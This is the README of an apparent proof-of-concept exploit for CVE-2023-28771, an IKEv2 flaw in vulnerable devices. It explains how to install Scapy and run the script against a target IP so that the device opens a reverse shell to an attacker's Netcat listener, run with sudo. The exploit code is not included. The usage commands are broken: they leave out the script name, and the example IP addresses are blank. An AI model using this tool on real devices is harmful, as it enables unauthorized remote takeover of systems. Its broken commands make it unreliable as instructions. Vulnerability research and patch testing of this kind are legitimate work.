# PoC for CVE-2023-28771
The script is designed to facilitate testing and exploration of the IKEv2 protocol in vulnerable devices, based on Rapid7's exploitation techniques.

## Prerequisites

- Python 3.x
- Scapy library

## Installation

1. Clone the repository or download the script file.
2. Install the required dependencies by running the following command:

pip install scapy

## Usage

To send a custom IKEv2 packet, use the following command:

python3 -t <target_ip> -l <attacker_ip> -lp <attacker_port>

Replace `<target>` with the IP address of the target system. Replace `<attacker_ip>` with the IP address where you have Netcat running to receive the reverse shell. Replace `<attacker_port>` with the port number where Netcat is listening.

For example, to send a custom IKEv2 packet to a target system with IP address ``, and establish a reverse shell to the attacker's IP `` on port `3322`, run the following command:

`python3 -t -l -lp 3322`

Make sure you have Netcat running on the specified IP address and port to receive the reverse shell.
**Note:** The script may require administrative privileges to send and receive network packets. (run it with sudo!)